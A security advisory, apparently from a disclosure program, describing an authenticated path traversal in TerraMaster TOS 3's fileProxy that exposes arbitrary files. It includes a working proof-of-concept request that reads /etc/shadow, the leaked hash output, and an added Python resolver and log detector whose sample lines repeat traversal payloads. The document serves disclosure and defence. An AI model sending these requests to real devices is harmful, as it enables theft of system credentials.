SSD Advisory – TerraMaster Operating System (TOS) File Disclosure

Vulnerability Summary
The following advisory describes a File Disclosure vulnerability found in TerraMaster Operating System (TOS) version 3.
TerraMaster Operating System (TOS) is a Linux-based operating system developed for TerraMaster cloud storage NAS servers. TOS 3 is the newly launched third-generation release of the system.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor response
TerraMaster has released patches to address this vulnerability – “Tech team limit the normal user’s rights”.

Vulnerability Details
The TerraMaster Operating System is vulnerable to a file disclosure vulnerability.
The vulnerability is in the “index.php” file. When it is called with the parameters “explorer/fileProxy&path=”, any authenticated user can download any file on the system, because the supplied path value is not confined to the directory the file proxy is meant to serve.
Proof of Concept
An attacker who is logged in to the remote NAS can download the /etc/shadow file by sending the following request:

GET IPOfTheServer:Port/3.0//index.php?explorer/fileProxy&path=...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2f...%2f....%2f%2f%2fetc%2fshadow HTTP/1.1
Host: 127.0.0.1:8181

As can be seen below, the TerraMaster Operating System responds by sending the contents of the /etc/shadow file to the attacker:

root:$1$SgVbyjor$C7Ts4QXkjSjmHA5nSNH7x91:17220:0:99999:7:::
mysql:!:15139:0:99999:7:::
sshd:!:15139:0:99999:7:::
daemon:!:15206:0:99999:7:::
admin:$1$0/E6lWfi$qW5uGkMDFddDs3Pbt.UQyO/:17220:0:99999:7:::
rsync:$1$eCUOYuA7$T0mPjcyv6gq8CvwrNsKBX1:15278:0:99999:7:::
TimeMachine:$1$YEyZ4a58$RN4xjc0/3to9s3b0Fn4nU1:15310:0:99999:7:::
guest:$1$sEXZ4zTY$bxAsHrNEqAGtziZ5hlwLo.:15293:0:99999:7:::
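The two defender-side checks a practitioner would want for this class of bug, as an added example that is not TOS code and not part of the original advisory: a resolver that canonicalises the decoded path value and refuses anything outside an assumed share root (SHARE_ROOT and the directory layout are assumptions), and a detector run over constructed access-log lines that flags fileProxy requests whose decoded path contains a segment made only of dots, which catches both the classic ../ form and the dot-run variant used in the request above.

```python
import os
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

SHARE_ROOT = "/srv/share"  # assumed directory the download handler should be confined to

def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until stable (bounded) so a double-encoded %252f is seen as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def resolve_share_path(root: str, requested: str) -> Optional[str]:
    """Canonicalise `requested` beneath `root`; return None if it escapes root.
    Leading slashes are stripped so an absolute path cannot replace the root;
    realpath collapses '..' and symlinks before the containment check."""
    root_real = os.path.realpath(root)
    relative = fully_decode(requested).lstrip("/")
    candidate = os.path.realpath(os.path.join(root_real, relative))
    inside = candidate == root_real or candidate.startswith(root_real + os.sep)
    return candidate if inside else None

# A path segment made only of two or more dots ('..', '...', '....').
DOT_SEGMENT = re.compile(r"(^|/)\.{2,}(/|$)")
REQUEST_TARGET = re.compile(r'"GET (?P<target>\S+) HTTP/[\d.]+"')

def is_suspicious_fileproxy(log_line: str) -> bool:
    """True for fileProxy requests whose decoded path has a dots-only segment."""
    m = REQUEST_TARGET.search(log_line)
    if not m or "explorer/fileProxy" not in m.group("target"):
        return False
    query = urlsplit(m.group("target")).query
    for path in parse_qs(query).get("path", []):
        if DOT_SEGMENT.search(fully_decode(path)):
            return True
    return False

def flagged_sources(lines):
    """Client addresses of the log lines the detector flags."""
    return [line.split()[0] for line in lines if is_suspicious_fileproxy(line)]

SAMPLE_LOG = [  # constructed access-log lines, not real TOS logs
    '10.0.0.5 - - [01/Jan/2018:10:00:00 +0000] "GET /3.0//index.php?explorer/fileProxy&path=...%2f....%2f%2f%2f...%2f....%2f%2f%2fetc%2fshadow HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2018:10:00:01 +0000] "GET /3.0//index.php?explorer/fileProxy&path=Public%2freport.pdf HTTP/1.1" 200 4096',
    '10.0.0.9 - - [01/Jan/2018:10:00:02 +0000] "GET /3.0//index.php?explorer/fileProxy&path=..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1100',
]
```

The containment check is the fix the handler needs; the log detector is a heuristic for finding earlier abuse and will also flag a share that genuinely contains a directory named with only dots.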